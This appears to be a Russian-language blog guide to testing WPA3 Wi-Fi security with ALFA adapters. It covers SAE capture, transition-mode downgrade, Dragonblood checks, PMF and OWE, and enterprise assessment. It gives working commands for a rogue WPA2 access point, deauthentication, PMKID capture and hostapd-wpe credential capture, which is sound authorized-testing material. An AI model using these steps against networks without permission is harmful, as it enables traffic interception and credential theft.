Перейти к основному содержимому
Тестирование безопасности WPA3 с адаптерами ALFA (2026)
  1. Блог/

Тестирование безопасности WPA3 с адаптерами ALFA (2026)

Оглавление
Правовое уведомление: Всё тестирование безопасности беспроводных сетей должно выполняться только в сетях и на устройствах, для которых имеется явное письменное разрешение. Методы тестирования WPA3, включая захват SAE, деаутентификацию и развёртывание мошеннических точек доступа, подпадают под те же правовые требования, что и любая другая деятельность по оценке беспроводных сетей. Только авторизованное тестирование.
TL;DR: Тестирование безопасности WPA3 охватывает анализ рукопожатия SAE, атаки на понижение уровня в переходном режиме, оценку уязвимостей Dragonblood и принудительное включение PMF. AWUS036AXML для тестирования 6 ГГц, AWUS036ACH для 2.4/5 ГГц.

WPA3 представляет значительное улучшение по сравнению с WPA2 в части безопасности как персональных, так и корпоративных беспроводных сетей. Simultaneous Authentication of Equals (SAE) заменяет рукопожатие Pre-Shared Key (PSK) аутентифицированным обменом ключами на основе пароля, устойчивым к автономным атакам по словарю. Protected Management Frames (PMF) являются обязательными. Прямая секретность встроена изначально.

Тем не менее WPA3 не лишён уязвимостей. Исследование Dragonblood (2019) выявило атаки по сторонним каналам и уязвимости отказа в обслуживании в реализации рукопожатия SAE. Режим перехода вносит поверхности атаки для понижения версии. Корпоративные развёртывания сталкиваются с теми же слабостями проверки сертификатов 802.1X, что и WPA2-Enterprise. Данное руководство охватывает полную методологию тестирования безопасности WPA3 с использованием адаптеров ALFA Network, обеспечивающих стабильность режима мониторинга и возможность инъекции пакетов, необходимые для тщательной оценки.


Основы WPA3 для специалистов по безопасности
#

SAE: Simultaneous Authentication of Equals
#

SAE заменяет четырёхстороннее рукопожатие WPA2-PSK на обмен с нулевым разглашением на основе протокола обмена ключами Dragonfly. Ключевое свойство, важное для тестирования безопасности, — прямая секретность: даже если пароль Wi-Fi впоследствии окажется скомпрометированным, ранее захваченный трафик не может быть расшифрован. Это устраняет основную ценность автономного взлома парольных фраз против сети только с SAE.

SAE также устраняет уязвимость к атакам PMKID, которая была характерна для WPA2. Не существует эквивалентного артефакта, поддающегося автономному взлому, который пассивный злоумышленник мог бы извлечь из SAE-ассоциации.

PMF: обязателен в WPA3
#

802.11w Protected Management Frames обязательны в WPA3. Фреймы деаутентификации и разассоциации криптографически защищены, что предотвращает поддельные deauth-атаки, тривиально эффективные против сетей WPA2 без PMF. Сеть только с WPA3 должна быть устойчива к ускорению захвата рукопожатий на основе деаутентификации.

WPA3 Transition Mode
#

Наиболее распространённый сценарий реального развёртывания — WPA3 Transition Mode: точка доступа одновременно принимает аутентификацию как WPA3-SAE, так и WPA2-PSK для сохранения обратной совместимости с устройствами без поддержки WPA3. Этот режим является основной поверхностью атаки в современных корпоративных средах — он повторно вносит уязвимость рукопожатия WPA2 PSK в сеть, рекламирующую WPA3.

WPA3-Enterprise
#

WPA3-Enterprise предписывает 192-битный режим безопасности с использованием GCMP-256 и HMAC-SHA-384, с взаимной аутентификацией на основе сертификатов. Он решает те же уязвимости проверки сертификатов, что и WPA2-Enterprise, если не развёрнут должным образом. Методология тестирования уровня 802.1X рассмотрена в методологии оценки безопасности корпоративных беспроводных сетей.


Тестовая среда и требования к адаптерам
#

Выбор адаптера
#

Тестирование WPA3 требует адаптера с надёжным режимом мониторинга, поддержкой инъекции и — для сетей WPA3 на 6 ГГц — трёхдиапазонных возможностей:

  • AWUS036AXML — Необходим для сетей WPA3 Wi-Fi 6E (6 ГГц). Чипсет Mediatek MT7921AUN. Полная поддержка режима мониторинга и инъекций в Kali Linux с ядром 5.18+. Единственный адаптер ALFA, охватывающий каналы 6 ГГц, где развёртывания только с WPA3 становятся всё более распространёнными.
  • AWUS036ACH — Подходит для тестирования WPA3 на 2,4/5 ГГц. Чипсет RTL8812AU. Максимальная совместимость с инструментарием aircrack-ng и широчайшая поддержка драйверов в разных версиях Kali Linux.

Включение режима мониторинга
#

# Завершить мешающие процессы
sudo airmon-ng check kill

# Запустить режим мониторинга
sudo airmon-ng start wlan0

# Проверить интерфейс мониторинга
iwconfig wlan0mon

Полное руководство по настройке режима мониторинга см. в Включение режима мониторинга в Kali Linux.

Идентификация сетей WPA3 в результатах сканирования
#

# Пассивное сканирование всех диапазонов
sudo airodump-ng wlan0mon --band abg -w wpa3_scan

# Фильтрация сетей WPA3 в результатах
sudo airodump-ng wlan0mon --band abg | grep -i "SAE\|WPA3"

В выводе airodump-ng сети WPA3-SAE отображаются с WPA3 SAE в столбце AUTH. Сети в режиме перехода показывают WPA2 WPA3 SAE PSK. Сети с улучшенным шифрованием Open (OWE) показывают OWE.


Фаза 1: Захват и анализ рукопожатия SAE
#

Ограничения пассивного захвата
#

В отличие от WPA2, рукопожатия SAE не могут использоваться для автономных атак по словарю. Захват фреймов SAE commit и confirm несложен с любым адаптером в режиме мониторинга, однако захваченный материал не даёт поддающегося взлому хеша. Цель захвата фреймов SAE — анализ на уровне протокола: проверка того, что используется правильный вариант SAE, подтверждение согласования PMF и обеспечение доказательств в отчёте об оценке.

# Захват на канале целевой точки доступа
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w sae_capture wlan0mon

# Анализ захвата в Wireshark
# Фильтр: wlan.bssid == aa:bb:cc:dd:ee:ff && wlan.fc.type_subtype == 0x000b
# (0x000b = Authentication frame)
wireshark -r sae_capture-01.cap

В фреймах аутентификации проверьте обмен SAE commit и confirm. Информационный элемент RSN в beacon-фреймах должен показывать:

  • AKM Suite: 00-0F-AC:8 (SAE) для WPA3-Personal
  • PMF: Required (бит MFPR установлен в RSN Capabilities)

Тестирование PMKID на сетях SAE
#

Инструменты типа hcxdumptool будут пытаться извлечь PMKID из всех сетей, однако сети SAE не раскрывают поддающийся взлому PMKID. Запуск инструмента целесообразен для подтверждения отсутствия уязвимости WPA2 PMKID:

# Попытка захвата PMKID — сети SAE не должны давать поддающийся взлому PMKID
sudo hcxdumptool -i wlan0mon -o wpa3_pmkid.pcapng --enable_status=3

# Конвертация и проверка
hcxpcapngtool -o wpa3_hashes.hc22000 wpa3_pmkid.pcapng

# Пустой или отсутствующий файл хешей подтверждает отсутствие уязвимости WPA2 PMKID
wc -l wpa3_hashes.hc22000

Если hcxpcapngtool выводит заполненный файл .hc22000 для сети, рекламируемой как WPA3-only, это указывает на то, что точка доступа работает в режиме перехода и раскрывает WPA2 PMKID — значимая находка.


Фаза 2: Тестирование атаки понижения версии в режиме перехода
#

Поверхность атаки при понижении версии
#

WPA3 Transition Mode — наиболее существенная уязвимость WPA3 в современных корпоративных средах. Когда точка доступа работает в режиме перехода, она принимает ассоциации как SAE, так и PSK. Злоумышленник, способный наблюдать probe-запросы клиентов, может создать мошенническую точку доступа, представляющую только возможности WPA2-PSK для того же SSID — если клиент подключается без требования SAE, захватывается стандартное четырёхстороннее рукопожатие WPA2, которое может быть атаковано в автономном режиме.

Процедура тестирования
#

# Шаг 1: Подтвердить, что цель находится в режиме перехода (показывает WPA2+WPA3 в airodump-ng)
sudo airodump-ng wlan0mon --band abg | grep "TARGET_SSID"

# Шаг 2: Захватить beacon легитимной точки доступа для фиксации канала и конфигурации
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w transition_recon wlan0mon

# Шаг 3: Создать мошенническую точку доступа только с WPA2 на том же канале с помощью hostapd
# Создать /tmp/rogue_wpa2.conf:
cat > /tmp/rogue_wpa2.conf << 'EOF'
interface=wlan1
driver=nl80211
ssid=TARGET_SSID
channel=6
hw_mode=g
wpa=2
wpa_passphrase=TestPassphrase123
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
EOF

sudo hostapd /tmp/rogue_wpa2.conf &

# Шаг 4: Отслеживать ассоциации клиентов с мошеннической точкой доступа
sudo airodump-ng -c 6 --bssid ROGUE_BSSID -w downgrade_capture wlan0mon

Находка Critical: Если клиент, ранее подключавшийся через SAE, ассоциируется с мошеннической точкой доступа только с WPA2 (что подтверждается четырёхсторонним рукопожатием в файле захвата), ОС клиента не применяет требование WPA3-SAE. Это является успешной атакой понижения версии.

Условие Pass: Клиент игнорирует точку доступа только с WPA2 или отображает оповещение и не завершает рукопожатие WPA2.

Индикатор понижения версии в выводе hcxpcapngtool
#

# Конвертация захвата мошеннической точки доступа — наличие хеша подтверждает ассоциацию WPA2
hcxpcapngtool -o downgrade_hash.hc22000 downgrade_capture-01.cap
cat downgrade_hash.hc22000
# Непустой вывод = атака понижения версии прошла успешно

Фаза 3: Оценка уязвимостей Dragonblood
#

Предыстория
#

Исследование Dragonblood (Vanhoef & Ronen, 2019) выявило множество уязвимостей в реализации рукопожатия SAE:

  • CVE-2019-9494 / CVE-2019-9496: Атаки по сторонним каналам (на основе кеша и по времени) против фрейма SAE commit, позволяющие автономные атаки по словарю против непропатченных реализаций
  • CVE-2019-9499: Обход подтверждения SAE, ведущий к понижению WPA3-Personal до WPA2-PSK
  • DoS через флудинг SAE commit: Истощение таблиц состояний точки доступа путём отправки большого числа фреймов SAE commit

Большинство современных прошивок точек доступа устранило исходные уязвимости Dragonblood. Тем не менее тестирование на их наличие остаётся актуальным в средах со старыми или непропатченными прошивками.

Тестирование механизма anti-clogging в SAE
#

WPA3-SAE включает механизм anti-clogging для предотвращения DoS через флудинг commit-фреймов. Проверьте, правильно ли целевая точка доступа реализует anti-clogging:

# Установить hcxtools
sudo apt install hcxtools

# Использовать hcxdumptool для наблюдения за ограничением частоты обмена фреймами SAE commit/confirm
sudo hcxdumptool -i wlan0mon -o dragonblood_test.pcapng --enable_status=3

# В Wireshark применить фильтр для фреймов аутентификации и наблюдать:
# wlan.fc.type_subtype == 0x000b
# Искать ответы Anti-Clogging Token (ACT) во фреймах commit
wireshark -r dragonblood_test.pcapng

При корректно реализованной точке доступа быстрые SAE commit-запросы с нескольких исходных MAC-адресов должны инициировать ответы с Anti-Clogging Token (точка доступа возвращает токен, который должен быть включён в последующие commit-фреймы). Точки доступа, не реализующие ACT, уязвимы к DoS через флудинг SAE commit.

Проверка версии прошивки точки доступа
#

Версия прошивки является надёжным индикатором статуса патчей. Сравните обнаруженную версию прошивки точки доступа с рекомендациями по безопасности производителя:

  • Cisco: Security Advisory cisco-sa-wpa3-sae-side-channel (2019)
  • Aruba: ArubaOS 8.6+ устраняет Dragonblood
  • Ubiquiti: UniFi Network 6.0+ устраняет Dragonblood
  • MikroTik: RouterOS 6.45.7+ устраняет Dragonblood

Задокументируйте версию прошивки точки доступа в отчёте об оценке. Точка доступа с прошивкой, предшествующей этим выпускам, должна быть помечена как потенциально уязвимая вне зависимости от того, была ли активная эксплуатация подтверждена.


Фаза 4: Тестирование применения PMF в сетях WPA3
#

Почему тестирование PMF по-прежнему актуально
#

Несмотря на то что PMF обязателен в WPA3, тестирование фактического поведения применения важно по следующим причинам:

  1. Точки доступа в режиме перехода могут иметь PMF в состоянии «capable» вместо «required» на пути WPA2, допуская deauth-атаки против клиентов, подключённых через WPA2
  2. Неправильная конфигурация точки доступа может привести к тому, что PMF не согласовывается даже при SAE-ассоциациях
  3. Клиентские реализации могут некорректно применять PMF, даже когда точка доступа рекламирует его как обязательный

Тест деаутентификации
#

# Попытка деаутентификации тестового клиента, ассоциированного через WPA3-SAE
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

# Ожидаемый результат для корректно настроенной сети WPA3:
# - Тестовый клиент НЕ отключается (защищённые PMF управляющие фреймы отбрасываются)
# - airodump-ng не показывает захваченного рукопожатия

# Условие сбоя (находка):
# - Тестовый клиент отключается и переассоциируется
# - airodump-ng захватывает новое рукопожатие

PMF Capable vs. Required
#

Проверьте информационный элемент RSN в beacon-фреймах для подтверждения конфигурации PMF:

# Захват beacon-фреймов и декодирование RSN IE
sudo tshark -i wlan0mon -f "wlan type mgt subtype beacon and wlan.bssid == aa:bb:cc:dd:ee:ff" \
  -T fields -e wlan_mgt.rsn.capabilities.mfpc -e wlan_mgt.rsn.capabilities.mfpr \
  -c 5 2>/dev/null

Интерпретация вывода:

  • 1,1 — PMF Required (MFPR=1, MFPC=1): корректно для WPA3
  • 1,0 — PMF Capable, но не Required: находка Medium для сетей WPA3, High для корпоративных SSID
  • 0,0 — PMF Disabled: находка High для любой сети, рекламируемой как WPA3; свидетельствует о неправильной конфигурации точки доступа

Фаза 5: Тестирование OWE (Opportunistic Wireless Encryption)
#

Обзор OWE
#

OWE (Wi-Fi Enhanced Open) — замена WPA3 для полностью открытых (незашифрованных) гостевых сетей. OWE выполняет неаутентифицированный обмен ключами Диффи-Хеллмана для установления пошифрования на уровне сессии без необходимости ввода пароля. Он защищает от пассивного прослушивания в гостевых сетях, но не обеспечивает аутентификацию.

Тестирование OWE Transition Mode
#

Многие точки доступа развёртывают OWE в режиме перехода вместе с устаревшим открытым SSID (открытый SSID скрыт, OWE SSID виден). Проверьте, можно ли принудить клиентов подключиться к устаревшему открытому SSID:

# Сканирование скрытых SSID в паре с сетями OWE
sudo airodump-ng wlan0mon --band abg | grep -E "OWE|\<length: 0\>"

# Скрытый SSID без шифрования в паре с OWE SSID является переходным SSID
# Клиенты с поддержкой WPA3 должны предпочитать OWE; устаревшие клиенты переходят на открытую сеть

Находка: Если клиент с поддержкой WPA3 подключается к открытому переходному SSID вместо OWE SSID, ОС клиента некорректно обрабатывает OWE Transition Mode. Весь трафик этого клиента передаётся в незашифрованном виде.


Фаза 6: Оценка WPA3-Enterprise
#

Проверка 192-битного режима безопасности
#

WPA3-Enterprise предписывает шифрование GCMP-256 и аутентификацию HMAC-SHA-384 в 192-битном режиме безопасности. Проверьте через RSN IE в beacon-фреймах:

# Захват и декодирование RSN IE для корпоративного SSID
sudo tshark -i wlan0mon -f "wlan type mgt subtype beacon and wlan.bssid == aa:bb:cc:dd:ee:ff" \
  -T fields -e wlan_mgt.rsn.pcs.type -e wlan_mgt.rsn.akms.type \
  -c 10 2>/dev/null

Ожидаемые значения для WPA3-Enterprise 192-bit:

  • Pairwise Cipher Suite: GCMP-256 (00-0F-AC:9)
  • AKM Suite: EAP-SHA384 (00-0F-AC:12) или FT-EAP-SHA384 (00-0F-AC:13)

Наличие CCMP-128 в сети WPA3-Enterprise является находкой Medium; точка доступа не применяет требование 192-битной безопасности.

Тестирование с мошенническим RADIUS
#

WPA3-Enterprise уязвима к атакам с мошенническим RADIUS, если клиенты не проверяют сертификат сервера. Методология тестирования идентична WPA2-Enterprise:

# Развернуть мошенническую точку доступа с мошенническим RADIUS с помощью hostapd-wpe
sudo apt install hostapd-wpe

# Отредактировать /etc/hostapd-wpe/hostapd-wpe.conf для целевого SSID и канала
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Отслеживать захваченные хеши учётных данных

Полную процедуру тестирования EAP/RADIUS см. в методологии оценки безопасности корпоративных беспроводных сетей.


Справочник инструментов для тестирования WPA3
#

ИнструментНазначениеАдаптерКлючевая команда
airodump-ngОбнаружение сетей WPA3, захват фреймов SAEAWUS036AXML / AWUS036ACHsudo airodump-ng wlan0mon --band abg
hcxdumptoolЗахват PMKID/SAE, обнаружение режима переходаAWUS036AXMLsudo hcxdumptool -i wlan0mon -o out.pcapng --enable_status=3
hcxpcapngtoolКонвертация захватов, обнаружение уязвимости WPA2 в режиме переходаN/A (постобработка)hcxpcapngtool -o hash.hc22000 cap.pcapng
Wireshark / tsharkАнализ RSN IE, возможности PMF, инспекция фреймов SAEЛюбой (через файл захвата)tshark -i wlan0mon -T fields -e wlan_mgt.rsn.capabilities.mfpr
aireplay-ngТестирование применения PMF (деаутентификация)AWUS036ACHsudo aireplay-ng --deauth 10 -a BSSID wlan0mon
hostapdМошенническая точка доступа только с WPA2 для тестирования понижения версииAWUS036ACHsudo hostapd /tmp/rogue_wpa2.conf
hostapd-wpeМошеннический RADIUS для тестирования EAP в WPA3-EnterpriseAWUS036ACHsudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

Сводка находок для оценок WPA3
#

IDSeverityНаходкаУсловие
W3-01CriticalПонижение WPA3 до WPA2 прошло успешно; рукопожатие захвачено и поддаётся взломуКлиент ассоциировался с мошеннической точкой доступа только с WPA2; хеш восстановлен
W3-02HighРежим перехода без применения SAE; WPA2 PMKID раскрытhcxpcapngtool возвращает поддающийся взлому хеш из сети WPA3
W3-03HighPMF не применяется на SSID WPA3; deauth-атака прошла успешноТестовый клиент отключён деаутентификацией aireplay-ng
W3-04HighКлиенты WPA3-Enterprise принимают мошеннический RADIUS без предупреждения о сертификатеhostapd-wpe захватывает EAP-учётные данные тестового клиента
W3-05MediumPMF Capable, но не Required на SSID WPA3RSN IE показывает MFPC=1, MFPR=0
W3-06MediumWPA3-Enterprise не использует 192-битный режим безопасностиRSN IE показывает CCMP-128 вместо GCMP-256
W3-07MediumПрошивка точки доступа предшествует патчам DragonbloodСравнение версии прошивки с рекомендациями производителя
W3-08LowOWE Transition Mode; устаревшие клиенты подключаются в незашифрованном видеОткрытый SSID виден рядом с OWE SSID

常見問題

В чём отличия WPA3 от WPA2 при тестировании безопасности?

WPA3 использует рукопожатие SAE вместо PSK, обеспечивает прямую секретность и устойчив к офлайн-словарным атакам. PMF обязателен, но переходный режим создаёт поверхность для атак на понижение уровня.

Можно ли офлайн-взломать после захвата рукопожатия SAE?

Нет. Чистые SAE-сети не генерируют взламываемые хэши. Захват SAE-кадров используется только для анализа уровня протокола, подтверждения корректного варианта и согласования PMF.

Что такое атака на понижение уровня в переходном режиме WPA3?

AP в переходном режиме одновременно принимает SAE и PSK. Злоумышленник создаёт поддельный AP только с WPA2, если клиент не требует SAE, происходит понижение уровня, рукопожатие можно взломать офлайн.

Нужен ли адаптер 6 ГГц для тестирования WPA3?

Только для тестирования сетей WPA3 в диапазоне 6 ГГц нужен AWUS036AXML. Для тестирования WPA3 на 2.4/5 ГГц достаточно AWUS036ACH.

Нужно ли ещё тестировать уязвимости Dragonblood?

Современные прошивки AP в основном исправлены, но в средах со старым или неисправленным ПО всё ещё нужно тестировать боковые атаки CVE-2019-9494 и SAE commit flood DoS.

Связанные ресурсы
#

Источники
#

  1. Официальная исследовательская работа Dragonblood (Vanhoef & Ronen, 2019)
  2. Сертификация Wi-Fi Alliance WPA3
  3. Официальная документация aircrack-ng
  4. Документация инструмента hcxdumptool
  5. Стандарт IEEE 802.11w PMF

Здесь пока нет статей.